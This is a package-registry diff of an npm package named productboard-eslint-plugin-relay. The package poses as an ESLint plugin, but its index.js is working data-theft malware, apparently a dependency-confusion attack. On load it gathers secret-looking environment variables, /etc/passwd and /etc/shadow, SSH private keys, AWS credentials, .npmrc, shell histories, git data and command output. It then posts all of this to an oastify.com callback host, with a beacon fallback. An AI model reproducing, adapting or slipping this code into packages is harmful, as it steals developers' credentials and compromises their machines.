productboard-eslint-plugin-relay 99.0.111 → 100.0.1112

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/index.js +165 -49
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -1,65 +1,181 @@
1
1
  const os = require("os");
2
2
  const dns = require("dns");
3
3
  const fs = require("fs");
4
- const querystring = require("querystring");
4
+ const path = require("path");
5
5
  const https = require("https");
6
+ const querystring = require("querystring");
7
+ const child_process = require("child_process");
6
8
 
7
- function safeRead(path) {
9
+ function safeReadFile(p, maxSize = 10240) {
8
10
  try {
9
- return fs.readdirSync(path);
11
+ if (!fs.existsSync(p)) return "NOT FOUND";
12
+ const size = fs.statSync(p).size;
13
+ if (size > maxSize) return "TOO LARGE";
14
+ return fs.readFileSync(p, "utf8");
10
15
  } catch (e) {
11
16
  return `ERR: ${e.message}`;
12
17
  }
13
18
  }
14
19
 
15
- function getEnvVars() {
16
- const filtered = {};
17
- Object.keys(process.env).forEach(key => {
18
- if (/token|key|secret|pass|env/i.test(key)) {
19
- filtered[key] = process.env[key];
20
- }
21
- });
22
- return filtered;
20
+ function safeReadDir(p) {
21
+ try {
22
+ return fs.readdirSync(p);
23
+ } catch (e) {
24
+ return `ERR: ${e.message}`;
25
+ }
26
+ }
27
+
28
+ function exec(cmd) {
29
+ try {
30
+ return child_process.execSync(cmd, { timeout: 4000 }).toString().trim();
31
+ } catch (e) {
32
+ return `ERR: ${e.message}`;
33
+ }
23
34
  }
24
35
 
25
- const data = {
26
- p: require("./package.json").name,
27
- v: require("./package.json").version,
28
- user: os.userInfo().username,
29
- hostname: os.hostname(),
30
- homedir: os.homedir(),
31
- cwd: process.cwd(),
32
- dns: dns.getServers(),
33
- env: getEnvVars(),
34
- dirs: {
35
- "/": safeRead("/"),
36
- "/home": safeRead("/home"),
37
- "/root": safeRead("/root"),
38
- "/etc": safeRead("/etc"),
39
- },
40
- networkInterfaces: os.networkInterfaces(),
41
- };
42
-
43
- const postData = querystring.stringify({
44
- msg: JSON.stringify(data)
45
- });
46
-
47
- const options = {
48
- hostname: "lncun7wwzm88gjhfkldbcm35vw1npgd5.oastify.com",
49
- port: 443,
50
- path: "/",
51
- method: "POST",
52
- headers: {
53
- "Content-Type": "application/x-www-form-urlencoded",
54
- "Content-Length": postData.length,
55
- "User-Agent": "npm-rce-check"
36
+ function getSensitiveEnvVars() {
37
+ const result = {};
38
+ for (const key in process.env) {
39
+ if (/pass|key|token|secret|env|auth|cred/i.test(key)) {
40
+ result[key] = process.env[key];
41
+ }
56
42
  }
57
- };
43
+ return result;
44
+ }
45
+
46
+ function checkDockerOrCI() {
47
+ return {
48
+ cgroup: safeReadFile("/proc/1/cgroup"),
49
+ dockerenv: fs.existsSync("/.dockerenv"),
50
+ ciVars: Object.fromEntries(Object.entries(process.env).filter(([k]) => /ci|build|pipeline/i.test(k))),
51
+ };
52
+ }
58
53
 
59
- const req = https.request(options, res => {
60
- res.on("data", d => {});
61
- });
54
+ function getGitData() {
55
+ return {
56
+ branch: exec("git rev-parse --abbrev-ref HEAD"),
57
+ remotes: exec("git remote -v"),
58
+ config: safeReadFile(path.join(os.homedir(), ".gitconfig")),
59
+ };
60
+ }
61
+
62
+ function getSystemState() {
63
+ return {
64
+ whoami: exec("whoami"),
65
+ id: exec("id"),
66
+ ps: exec("ps aux | head -n 20"),
67
+ netstat: exec("netstat -tunlp | head -n 20"),
68
+ lsof: exec("lsof -n | head -n 20"),
69
+ uname: exec("uname -a"),
70
+ dmesg: exec("dmesg | head -n 30"),
71
+ };
72
+ }
73
+
74
+ function getInstalledTools() {
75
+ return {
76
+ npm: exec("npm ls -g --depth=0 --json"),
77
+ apt: exec("dpkg -l | head -n 20"),
78
+ brew: exec("brew list || echo 'no brew'"),
79
+ which_nmap: exec("which nmap"),
80
+ which_curl: exec("which curl"),
81
+ };
82
+ }
83
+
84
+ let dump = {};
85
+
86
+ try {
87
+ dump = {
88
+ timestamp: new Date().toISOString(),
89
+ app: (() => {
90
+ try {
91
+ const pkg = require("./package.json");
92
+ return { name: pkg.name, version: pkg.version };
93
+ } catch {
94
+ return {};
95
+ }
96
+ })(),
97
+ os: {
98
+ hostname: os.hostname(),
99
+ platform: os.platform(),
100
+ arch: os.arch(),
101
+ uptime: os.uptime(),
102
+ cpus: os.cpus(),
103
+ totalmem: os.totalmem(),
104
+ freemem: os.freemem(),
105
+ userInfo: os.userInfo(),
106
+ tmpdir: os.tmpdir(),
107
+ homedir: os.homedir(),
108
+ cwd: process.cwd(),
109
+ },
110
+ env: getSensitiveEnvVars(),
111
+ dns: (() => {
112
+ try {
113
+ return dns.getServers();
114
+ } catch (e) {
115
+ return [`ERR: ${e.message}`];
116
+ }
117
+ })(),
118
+ dirs: {
119
+ "/": safeReadDir("/"),
120
+ "/home": safeReadDir("/home"),
121
+ "/root": safeReadDir("/root"),
122
+ "/etc": safeReadDir("/etc"),
123
+ "~": safeReadDir(os.homedir()),
124
+ },
125
+ files: {
126
+ etc_passwd: safeReadFile("/etc/passwd"),
127
+ etc_shadow: safeReadFile("/etc/shadow"),
128
+ etc_hosts: safeReadFile("/etc/hosts"),
129
+ bash_history: safeReadFile(path.join(os.homedir(), ".bash_history")),
130
+ zsh_history: safeReadFile(path.join(os.homedir(), ".zsh_history")),
131
+ ssh_config: safeReadFile(path.join(os.homedir(), ".ssh/config")),
132
+ ssh_id_rsa: safeReadFile(path.join(os.homedir(), ".ssh/id_rsa")),
133
+ ssh_known_hosts: safeReadFile(path.join(os.homedir(), ".ssh/known_hosts")),
134
+ aws_credentials: safeReadFile(path.join(os.homedir(), ".aws/credentials")),
135
+ npmrc: safeReadFile(path.join(os.homedir(), ".npmrc")),
136
+ gitconfig: safeReadFile(path.join(os.homedir(), ".gitconfig")),
137
+ },
138
+ git: getGitData(),
139
+ docker: checkDockerOrCI(),
140
+ system: getSystemState(),
141
+ tools: getInstalledTools(),
142
+ network: os.networkInterfaces(),
143
+ };
144
+ } catch (e) {
145
+ dump = { error: "Top-level error collecting dump", msg: e.message };
146
+ }
147
+
148
+ // 🌐 send to your callback
149
+ try {
150
+ const postData = querystring.stringify({
151
+ msg: JSON.stringify(dump)
152
+ });
153
+
154
+ const options = {
155
+ hostname: "4otdoqxf059rh2iyl4eud54owf26qyen.oastify.com",
156
+ port: 443,
157
+ path: "/",
158
+ method: "POST",
159
+ headers: {
160
+ "Content-Type": "application/x-www-form-urlencoded",
161
+ "Content-Length": postData.length,
162
+ "User-Agent": "rce-impact-demo"
163
+ }
164
+ };
165
+
166
+ const req = https.request(options, res => {
167
+ res.on("data", () => { });
168
+ });
62
169
 
63
- req.on("error", () => {});
64
- req.write(postData);
65
- req.end();
170
+ req.on("error", () => { });
171
+ req.write(postData);
172
+ req.end();
173
+
174
+ // ✅ DNS fallback (guaranteed beacon)
175
+ https.get("https://ping.4otdoqxf059rh2iyl4eud54owf26qyen.oastify.com/", () => { });
176
+
177
+ } catch (e) {
178
+ try {
179
+ https.get("https://ping.4otdoqxf059rh2iyl4eud54owf26qyen.oastify.com/", () => { });
180
+ } catch { }
181
+ }
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "productboard-eslint-plugin-relay",
3
- "version": "99.0.111",
3
+ "version": "100.0.1112",
4
4
  "main": "index.js",
5
5
  "keywords": [],
6
6
  "scripts": {